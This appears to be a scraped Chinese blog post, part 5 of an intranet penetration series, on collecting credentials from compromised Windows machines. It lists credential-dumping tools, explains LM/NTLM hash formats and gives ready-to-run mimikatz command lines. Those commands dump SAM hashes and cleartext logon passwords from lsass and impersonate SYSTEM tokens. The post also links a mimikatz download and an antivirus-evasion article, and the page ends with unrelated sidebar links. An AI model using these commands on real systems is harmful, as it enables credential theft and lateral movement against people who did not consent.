当前位置:网站首页>Intranet information collection of Intranet penetration (5)
Intranet information collection of Intranet penetration (5)
2022-07-06 14:07:00 【Unknown white hat】
Voucher information collection
01 Voucher acquisition tool
Often used to get windows Password tools
- mimikatz
- wce
- pwddump7
- ophcrack
- procdump+mimikatz
- lazagne
02 password hash
LM Hash &NTLM Type hash
winodws hash:
2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | |
LM | √ | √ | √ | ||||
NTLM | √ | √ | √ | √ | √ | √ | √ |
windows Local hash:
http://www.secpulse.com/archives/65256.html
windows Under the system hash Password format :
User name :RID:LM-HASH value :NT-HASH value

03mimikatz
mimikatz download :
link :https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg
Extraction code :jryu
Non local interactive credential acquisition
mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"
Generally, the target plane is landed remotely , Download in the target mimikatz
log result.txt( Send the results to txt in )
privilege::debug( Raise the right )

token::elevate( Impersonate token : Used to promote permissions to SYSTEM ( Default ) Or find the domain administrator token in the box )

Get system User token
lsadump::sam( Get user hash )

sekurlsa::logonpasswords( Get clear text password )

mimikatz1.x edition :
privilege::debug // Increase authority
inject::process lsass.exe sekurlsa.dll // Inject sekurlsa.dll To lsass.exe In progress
@getLogonPasswords // Get password
mimikatz No killing :
https://www.freebuf.com/articles/system/234365.html
04get-hashs

边栏推荐
猜你喜欢

小程序web抓包-fiddler

强化学习基础记录

Programme de jeu de cartes - confrontation homme - machine

Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning

. How to upload XMIND files to Jinshan document sharing online editing?

sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现

1143_ SiCp learning notes_ Tree recursion

外网打点(信息收集)

SRC挖掘思路及方法

7-5 staircase upgrade (PTA program design)
随机推荐
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
HackMyvm靶机系列(5)-warez
Hackmyvm target series (1) -webmaster
canvas基础2 - arc - 画弧线
力扣152题乘数最大子数组
7-3 construction hash table (PTA program design)
XSS之冷门事件
Hackmyvm target series (5) -warez
【头歌educoder数据表中数据的插入、修改和删除】
记一次猫舍由外到内的渗透撞库操作提取-flag
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
7-4 hash table search (PTA program design)
【educoder数据库实验 索引】
UGUI—Text
7-6 矩阵的局部极小值(PTA程序设计)
强化学习基础记录
实验八 异常处理
Beautified table style
小程序web抓包-fiddler
Hackmyvm target series (6) -videoclub